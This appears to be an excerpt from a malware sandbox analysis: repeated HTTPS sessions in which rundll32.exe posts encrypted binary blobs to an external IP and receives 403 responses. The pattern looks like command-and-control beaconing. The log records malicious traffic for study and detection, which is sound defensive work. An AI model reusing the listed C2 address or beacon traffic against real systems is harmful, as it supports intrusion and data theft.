                                                                                                      2021-10-28 02:56:15 UTC289OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:16 UTC294INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:16 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      59192.168.2.750027192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:17 UTC294OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:17 UTC294OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:18 UTC299INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.749752192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:30 UTC29OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:30 UTC30OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:31 UTC34INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      60192.168.2.750034192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:19 UTC299OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:19 UTC299OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:20 UTC304INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:20 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      61192.168.2.750038192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:21 UTC304OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:21 UTC304OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:22 UTC309INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      62192.168.2.750042192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:23 UTC309OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:23 UTC309OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:24 UTC314INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      63192.168.2.750047192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:26 UTC314OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:26 UTC314OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:26 UTC319INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      64192.168.2.750049192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:27 UTC319OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:27 UTC319OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:28 UTC324INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      65192.168.2.750055192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:30 UTC324OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:30 UTC324OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:30 UTC329INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      66192.168.2.750057192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:31 UTC329OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:31 UTC329OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:31 UTC334INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      67192.168.2.750072192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:35 UTC334OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:35 UTC334OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:36 UTC339INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      68192.168.2.750077192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:36 UTC339OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:36 UTC339OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:37 UTC344INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      69192.168.2.750094192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:39 UTC344OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:39 UTC344OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:40 UTC349INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.749754192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:32 UTC34OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
